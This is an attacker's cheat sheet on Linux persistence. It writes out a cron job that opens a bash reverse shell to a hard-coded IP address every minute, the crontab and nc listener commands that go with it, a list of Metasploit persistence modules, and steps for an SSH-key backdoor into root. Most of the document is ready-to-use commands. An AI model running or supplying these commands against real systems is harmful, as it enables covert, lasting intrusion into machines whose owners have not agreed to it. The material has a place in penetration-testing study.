MITRE Technique: https://attack.mitre.org/techniques/T1053/
Persistence via Cronjobs:
Create a cron that runs every minute all time and run a reverse connection to our attacking machine and save it as cron
*** Specify the Attacking IP because it's a reverse shell......
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.203.156.3/7777 0>&1'" > cron
Then to add it as a cronjob:
crontab -i cron
Then listen to the specified port:
nc -nvlp <PORT>
And we should get a connection...
Persistence MSF Modules:
search platform:linux persistence
| Module | Description |
|---|---|
exploit/linux/local/apt_package_manager_persistence |
This module will run a payload when the package manager is used. No handler is ran automatically so you must configure an appropriate exploit/multi/handler to connect. This module creates a pre-invoke hook for APT in apt.conf.d. The hook name syntax is numeric followed by text. |
exploit/linux/local/cron_persistence |
This module will create a cron or crontab entry to execute a payload. The module includes the ability to automatically clean up those entries to prevent multiple executions. syslog will get a copy of the cron entry. |
exploit/linux/local/service_persistence |
This module will create a service on the box, and mark it for auto-restart. We need enough access to write service files and potentially restart services |
post/linux/manage/sshkey_persistence # BEST METHOD |
This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time. set CREATESSHFOLDER trueset SESSION <session_id>Then create a file and add the sshkey to it with limited permissions: chmod 400 ssh_key Then Login with SSH: ssh -i ssh_key root@<ip> |